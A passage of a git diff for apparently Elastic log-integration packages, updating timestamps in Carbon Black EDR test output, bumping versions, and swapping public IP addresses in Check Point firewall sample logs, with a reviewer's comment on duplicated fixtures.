@@ -3057,7 +3057,7 @@ }, "event": { "action": "ingress.event.remotethread", - "ingested": "2021-08-17T19:44:42.797729800Z", + "ingested": "2021-12-09T13:31:11.838052600Z", "category": [ "process" ], @@ -3105,7 +3105,7 @@ }, "event": { "action": "ingress.event.regmod", - "ingested": "2021-08-17T19:44:42.797738200Z", + "ingested": "2021-12-09T13:31:11.838058800Z", "category": [ "registry" ], @@ -3143,7 +3143,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797746500Z", + "ingested": "2021-12-09T13:31:11.838064900Z", "category": [ "file" ], @@ -3180,7 +3180,7 @@ }, "event": { "action": "ingress.event.tamper", - "ingested": "2021-08-17T19:44:42.797754600Z", + "ingested": "2021-12-09T13:31:11.838071100Z", "category": [ "process", "driver" @@ -3225,7 +3225,7 @@ }, "event": { "action": "binaryinfo.host.observed", - "ingested": "2021-08-17T19:44:42.797762800Z", + "ingested": "2021-12-09T13:31:11.838077200Z", "category": [ "host" ], @@ -3269,7 +3269,7 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2021-08-17T19:44:42.797771200Z", + "ingested": "2021-12-09T13:31:11.838083700Z", "kind": "event" }, "tags": [ @@ -3315,7 +3315,7 @@ }, "event": { "action": "ingress.event.module", - "ingested": "2021-08-17T19:44:42.797779400Z", + "ingested": "2021-12-09T13:31:11.838089800Z", "category": [ "process" ], @@ -3357,7 +3357,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797787600Z", + "ingested": "2021-12-09T13:31:11.838097900Z", "category": [ "file" ], @@ -3408,7 +3408,7 @@ }, "event": { "action": "ingress.event.netconn", - "ingested": "2021-08-17T19:44:42.797796Z", + "ingested": "2021-12-09T13:31:11.838104800Z", "category": [ "network" ], @@ -3446,7 +3446,7 @@ }, "event": { "action": "unknown", - "ingested": "2021-08-17T19:44:42.797804100Z", + "ingested": "2021-12-09T13:31:11.838111Z", "kind": "event" }, "tags": [ 
@@ -3492,7 +3492,7 @@ }, "event": { "action": "ingress.event.remotethread", - "ingested": "2021-08-17T19:44:42.797812300Z", + "ingested": "2021-12-09T13:31:11.838117400Z", "category": [ "process" ], @@ -3540,7 +3540,7 @@ }, "event": { "action": "ingress.event.regmod", - "ingested": "2021-08-17T19:44:42.797820500Z", + "ingested": "2021-12-09T13:31:11.838123700Z", "category": [ "registry" ], @@ -3592,7 +3592,7 @@ }, "event": { "action": "ingress.event.childproc", - "ingested": "2021-08-17T19:44:42.797828600Z", + "ingested": "2021-12-09T13:31:11.838129900Z", "category": [ "process" ], @@ -3631,7 +3631,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797836900Z", + "ingested": "2021-12-09T13:31:11.838136200Z", "category": [ "file" ], @@ -3668,7 +3668,7 @@ }, "event": { "action": "ingress.event.tamper", - "ingested": "2021-08-17T19:44:42.797845200Z", + "ingested": "2021-12-09T13:31:11.838142400Z", "category": [ "process", "driver" @@ -3717,7 +3717,7 @@ }, "event": { "action": "binaryinfo.host.observed", - "ingested": "2021-08-17T19:44:42.797855Z", + "ingested": "2021-12-09T13:31:11.838148700Z", "category": [ "host" ], @@ -3761,7 +3761,7 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2021-08-17T19:44:42.797863700Z", + "ingested": "2021-12-09T13:31:11.838155Z", "kind": "event" }, "tags": [ @@ -3807,7 +3807,7 @@ }, "event": { "action": "ingress.event.module", - "ingested": "2021-08-17T19:44:42.797871900Z", + "ingested": "2021-12-09T13:31:11.838161200Z", "category": [ "process" ], @@ -3849,7 +3849,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797880300Z", + "ingested": "2021-12-09T13:31:11.838167400Z", "category": [ "file" ], @@ -3899,7 +3899,7 @@ }, "event": { "action": "ingress.event.netconn", - "ingested": "2021-08-17T19:44:42.797920800Z", + "ingested": "2021-12-09T13:31:11.838173600Z", "category": [ "network" ], 
@@ -3946,7 +3946,7 @@ }, "event": { "action": "ingress.event.regmod", - "ingested": "2021-08-17T19:44:42.797929800Z", + "ingested": "2021-12-09T13:31:11.838179800Z", "category": [ "registry" ], @@ -3998,7 +3998,7 @@ }, "event": { "action": "ingress.event.remotethread", - "ingested": "2021-08-17T19:44:42.797936600Z", + "ingested": "2021-12-09T13:31:11.838186Z", "category": [ "process" ], @@ -4046,7 +4046,7 @@ }, "event": { "action": "ingress.event.regmod", - "ingested": "2021-08-17T19:44:42.797940900Z", + "ingested": "2021-12-09T13:31:11.838192300Z", "category": [ "registry" ], @@ -4098,7 +4098,7 @@ }, "event": { "action": "ingress.event.childproc", - "ingested": "2021-08-17T19:44:42.797946700Z", + "ingested": "2021-12-09T13:31:11.838198500Z", "category": [ "process" ], @@ -4137,7 +4137,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797955400Z", + "ingested": "2021-12-09T13:31:11.838204800Z", "category": [ "file" ], @@ -4187,7 +4187,7 @@ }, "event": { "action": "ingress.event.filemod", - "ingested": "2021-08-17T19:44:42.797963500Z", + "ingested": "2021-12-09T13:31:11.838211Z", "category": [ "file" ], @@ -4231,7 +4231,7 @@ }, "event": { "action": "binaryinfo.host.observed", - "ingested": "2021-08-17T19:44:42.797971900Z", + "ingested": "2021-12-09T13:31:11.838217300Z", "category": [ "host" ], @@ -4275,7 +4275,7 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2021-08-17T19:44:42.797979300Z", + "ingested": "2021-12-09T13:31:11.838223500Z", "kind": "event" }, "tags": [ @@ -4321,7 +4321,7 @@ }, "event": { "action": "ingress.event.module", - "ingested": "2021-08-17T19:44:42.797985400Z", + "ingested": "2021-12-09T13:31:11.838230300Z", "category": [ "process" ], @@ -4363,7 +4363,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797994Z", + "ingested": "2021-12-09T13:31:11.838236600Z", "category": [ "file" ], 
@@ -4413,7 +4413,7 @@
 },
 "event": {
 "action": "ingress.event.netconn",
- "ingested": "2021-08-17T19:44:42.797998700Z",
+ "ingested": "2021-12-09T13:31:11.838242800Z",
 "category": [
 "network"
 ],
@@ -4459,7 +4459,7 @@
 },
 "event": {
 "action": "ingress.event.filemod",
- "ingested": "2021-08-17T19:44:42.798004700Z",
+ "ingested": "2021-12-09T13:31:11.838249100Z",
 "category": [
 "file"
 ],
@@ -4511,7 +4511,7 @@
 },
 "event": {
 "action": "ingress.event.remotethread",
- "ingested": "2021-08-17T19:44:42.798013200Z",
+ "ingested": "2021-12-09T13:31:11.838255300Z",
 "category": [
 "process"
 ],
diff --git a/packages/carbonblack_edr/manifest.yml b/packages/carbonblack_edr/manifest.yml
index 7fe83db0f9a..f68689a20b1 100644
--- a/packages/carbonblack_edr/manifest.yml
+++ b/packages/carbonblack_edr/manifest.yml
@@ -1,6 +1,6 @@
 name: carbonblack_edr
 title: VMware Carbon Black EDR
-version: 0.3.0
+version: 0.3.1
 release: experimental
 description: Collect logs from VMware Carbon Black EDR with Elastic Agent.
 type: integration
diff --git a/packages/checkpoint/_dev/deploy/docker/sample_logs/test-checkpoint.log b/packages/checkpoint/_dev/deploy/docker/sample_logs/test-checkpoint.log
index 9e86bccac9c..e659322e65b 100644
--- a/packages/checkpoint/_dev/deploy/docker/sample_logs/test-checkpoint.log
+++ b/packages/checkpoint/_dev/deploy/docker/sample_logs/test-checkpoint.log
@@ -1,20 +1,20 @@
 <134>1 2020-03-29T13:19:20Z gw-da58d3 CheckPoint 1930 - [flags:"133440"; ifdir:"inbound"; ifname:"daemon"; loguid:"{0x5e80a059,0x0,0x6401a8c0,0x3c7878a}"; origin:"192.168.1.100"; sequencenum:"1"; version:"5"; product:"System Monitor"; sys_message::"The eth0 interface is not protected by the anti-spoofing feature. Your network may be at risk"]
 <134>1 2020-03-29T13:19:21Z gw-da58d3 CheckPoint 1930 - [flags:"133440"; ifdir:"inbound"; ifname:"daemon"; loguid:"{0x5e80a059,0x2,0x6401a8c0,0x3c7878a}"; origin:"192.168.1.100"; sequencenum:"2"; version:"5"; product:"System Monitor"; sys_message::"installed Standard"]
 <134>1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a05a,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46915"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a05a,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\]"; dst:"194.29.39.10"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61794"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"26680"; xlatesrc:"0.0.0.0"]
+<134>1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a05a,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\]"; dst:"81.2.69.144"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61794"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"26680"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a05a,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36749"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:18:44Z gw-da58d3 CheckPoint 8363 - [flags:"133440"; ifdir:"inbound"; loguid:"{0x5e812cd4,0x1,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; comment:"No update was found"; description:"Contracts"; product:"Security Gateway/Management"; status:"Finished"; update_service:"1"; version:"1.0"]
-<134>1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812cd3,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61180"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10860"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T23:18:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cdd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523933"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55039"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812cd3,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"81.2.69.144"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61180"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10860"; xlatesrc:"0.0.0.0"]
+<134>1 2020-03-29T23:18:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cdd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"81.2.69.144"; log_delay:"1585523933"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55039"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-30T01:18:44Z gw-da58d3 CheckPoint 8363 - [flags:"133440"; ifdir:"inbound"; loguid:"{0x5e8148f5,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; description:"Contracts"; product:"Security Gateway/Management"; status:"Started"; update_service:"1"; version:"1.0"]
-<134>1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8148f6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51894"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"11157"; xlatesrc:"0.0.0.0"]
+<134>1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8148f6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"81.2.69.144"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51894"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"11157"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8148f6,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47919"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [flags:"133440"; ifdir:"inbound"; loguid:"{0x5e8148f7,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; comment:"No update was found"; description:"Contracts"; product:"Security Gateway/Management"; status:"Finished"; update_service:"1"; version:"1.0"]
 <134>1 2020-03-30T06:12:45Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e818ddd,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-30T06:12:51Z gw-da58d3 CheckPoint 8363 - [flags:"166216"; ifdir:"outbound"; loguid:"{0x5e818de4,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; db_ver:"20033003"; description:"Gateway was updated with database version: 22032001."; product:"Application Control"; severity:"1"; update_status:"updated"]
 <134>1 2020-03-30T06:12:51Z gw-da58d3 CheckPoint 8363 - [flags:"166216"; ifdir:"outbound"; loguid:"{0x5e818de4,0x1,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; db_ver:"20033003"; description:"Gateway was updated with database version: 22032001."; product:"URL Filtering"; severity:"1"; update_status:"updated"]
 <134>1 2020-03-30T06:13:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e818e01,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.1"]
-<134>1 2020-03-30T06:13:42Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e818e17,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2.21.41.118"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"65488"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
+<134>1 2020-03-30T06:13:42Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e818e17,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"81.2.69.144"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"65488"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
 <134>1 2020-03-30T07:18:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e819d63,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-30T07:19:22Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e819d7a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50024"; service:"137"; service_id:"nbname"; src:"192.168.1.196"]
 <134>1 2020-03-30T07:20:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e819dc1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60226"; service:"22"; service_id:"ssh"; src:"192.168.1.205"]
diff --git a/packages/checkpoint/changelog.yml b/packages/checkpoint/changelog.yml
index f84cf47810d..305780f527d 100644
--- a/packages/checkpoint/changelog.yml
+++ b/packages/checkpoint/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.2.1"
+ changes:
+ - description: Change test public IPs to the supported subset
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2327
 - version: "1.2.0"
 changes:
 - description: Add 8.0.0 version constraint
diff --git a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log
index afa04893969..276375258b4 100644
--- a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log
+++ b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log
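Review bot: This docker sample log is byte-identical to the pipeline test fixture test-checkpoint.log further down in the diff (both move from blob 9e86bccac9c to e659322e65b), so the same five IP replacements had to be applied twice by hand, and the two copies will drift the next time only one of them is edited. Consider deriving one from the other (a copy step or symlink in the package build, if elastic-package tolerates it) so a single fixture is the source of truth. Within this hunk the replacement looks complete: apart from 81.2.69.144, every address left on the new side is RFC 1918, 0.0.0.0, or the gateway's own 192.168.1.100.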
@@ -1,2 +1,2 @@
